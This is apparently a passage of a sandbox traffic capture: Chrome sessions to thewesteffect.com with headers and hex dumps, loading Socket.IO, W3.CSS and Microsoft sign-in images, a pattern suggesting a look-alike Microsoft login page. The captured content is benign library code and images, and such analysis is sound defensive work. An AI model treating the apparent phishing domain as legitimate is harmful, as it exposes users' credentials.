                                          ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                          Server: Vercel
                                          Strict-Transport-Security: max-age=63072000
                                          X-Vercel-Cache: HIT
                                          X-Vercel-Id: fra1::qxsjc-1725538203767-a565e46decc2
                                          X-Cache: Hit from cloudfront
                                          Via: 1.1 80b00aa2dcc58ca61b2465a37c89fc92.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: FRA60-P10
                                          X-Amz-Cf-Id: ytqwBSWjl8hSuwC-RyU0fpMjE9HC1bStKD_nOarAlLxaFACe9Smbcw==
                                          Age: 7243889
                                          2024-11-18 22:43:57 UTC15681INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                          Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                          2024-11-18 22:43:57 UTC16384INData Raw: 69 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75
                                          Data Ascii: id this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fu
                                          2024-11-18 22:43:57 UTC16384INData Raw: 3a 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68
                                          Data Ascii: :e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,th
                                          2024-11-18 22:43:57 UTC1544INData Raw: 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72
                                          Data Ascii: setTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.449744192.254.232.1334435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:57 UTC352OUTGET /favicon.ico HTTP/1.1
                                          Host: thewesteffect.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC306INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Tue, 25 Mar 2014 18:04:14 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 2780
                                          Cache-Control: max-age=604800
                                          Expires: Mon, 25 Nov 2024 22:43:57 GMT
                                          Content-Type: image/x-icon
                                          2024-11-18 22:43:57 UTC2780INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 08 00 ab 03 00 00 26 00 00 00 20 20 00 00 01 00 08 00 0b 07 00 00 d1 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 03 72 49 44 41 54 38 cb 65 8f 59 68 5c 65 00 85 cf ff ff 77 72 e7 de 3b fb 98 65 26 cb 74 9c 4c 9b 26 99 34 6d 69 63 52 14 34 a6 49 a9 c6 ba 14 c1 e5 49 45 b4 3e f8 24 45 b0 8a 0a d2 a7 d2 17 05 a5 a0 0f 22 14 8b 08 a2 60 51 b4 76 79 48 2a d1 34 b4 4d da 2c 36 db 4c 66 32 93 99 3b 77 bf ff f5 a5 14 97 f3 fc 9d 8f 73 88 d8 ff 0c fe 17 ce 43 72 5b f6 14 af 54 c2 ba 9a 7f 13 84 2c 33 41 02 a5 3e d8 96 0a 42 c8 3d 94 09 2d dd ff ea 7a 8e 03 31 d1 fe 7a 6c d7 f0 71 49 0f 74 db 66 e9 3e db d6 a6 41 88 4a 40 fd 9c 3b f6 3f 05 e4 bf 0b 3c d7 91 e3
                                          Data Ascii: & PNGIHDRarIDAT8eYh\ewr;e&tL&4micR4IIE>$E"`QvyH*4M,6Lf2;wsCr[T,3A>B=-z1zlqItf>AJ@;?<


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.449745192.229.133.2214435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:57 UTC546OUTGET /w3css/4/w3.css HTTP/1.1
                                          Host: www.w3schools.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC575INHTTP/1.1 200 OK
                                          Age: 31871
                                          Cache-Control: public,max-age=31536000,public
                                          Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                          Content-Type: text/css
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Etag: "0b892bdb339db1:0+ident"
                                          Last-Modified: Mon, 18 Nov 2024 12:16:48 GMT
                                          Server: ECS (lhd/35B3)
                                          Vary: Accept-Encoding
                                          X-Cache: HIT
                                          X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                          X-Powered-By: ASP.NET
                                          Content-Length: 23427
                                          Connection: close
                                          2024-11-18 22:43:57 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                          Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                          2024-11-18 22:43:57 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                          Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.449748152.199.21.1754435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:57 UTC661OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                          Host: aadcdn.msftauth.net
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC738INHTTP/1.1 200 OK
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Age: 20625009
                                          Cache-Control: public, max-age=31536000
                                          Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                          Content-Type: image/svg+xml
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Etag: 0x8DB5C3F4AC59B47
                                          Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                          Server: ECAcc (lhc/78BB)
                                          Vary: Accept-Encoding
                                          X-Cache: HIT
                                          x-ms-blob-type: BlockBlob
                                          x-ms-lease-status: unlocked
                                          x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                          x-ms-version: 2009-09-19
                                          Content-Length: 1636
                                          Connection: close
                                          2024-11-18 22:43:57 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.449756184.28.90.27443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:57 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          Accept-Encoding: identity
                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                          Range: bytes=0-2147483646
                                          User-Agent: Microsoft BITS/7.8
                                          Host: fs.microsoft.com
                                          2024-11-18 22:43:57 UTC515INHTTP/1.1 200 OK
                                          ApiVersion: Distribute 1.1
                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                          Content-Type: application/octet-stream
                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                          Server: ECAcc (lpl/EF06)
                                          X-CID: 11
                                          X-Ms-ApiVersion: Distribute 1.2
                                          X-Ms-Region: prod-weu-z1
                                          Cache-Control: public, max-age=151248
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Content-Length: 55
                                          Connection: close
                                          X-CID: 2
                                          2024-11-18 22:43:57 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.44976013.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:58 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:58 UTC785INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:58 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 1435
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                          ETag: 0x8DB5C3F4911527F
                                          x-ms-request-id: 3369c4e7-601e-0065-3ad5-371aad000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224358Z-1866b5c5fbbls4jchC1DFWnmb400000001xg000000000cup
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:58 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                          Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.44975813.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:58 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:58 UTC805INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:58 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 673
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                          ETag: 0x8DB5C3F47E260FD
                                          x-ms-request-id: b31c827f-601e-0075-1b33-36dfc5000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224358Z-16547b76f7fw2955hC1DFWsptc0000000700000000008tks
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:58 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                          Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.44975713.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:58 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:58 UTC805INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:58 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 199
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                          ETag: 0x8DB5C3F49C21D98
                                          x-ms-request-id: 2f706e99-601e-0033-04bf-38a350000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224358Z-1866b5c5fbbg9tvxhC1DFWy9mg000000028000000000qh5y
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:58 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                          Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.44975913.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:58 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:58 UTC785INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:58 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 2407
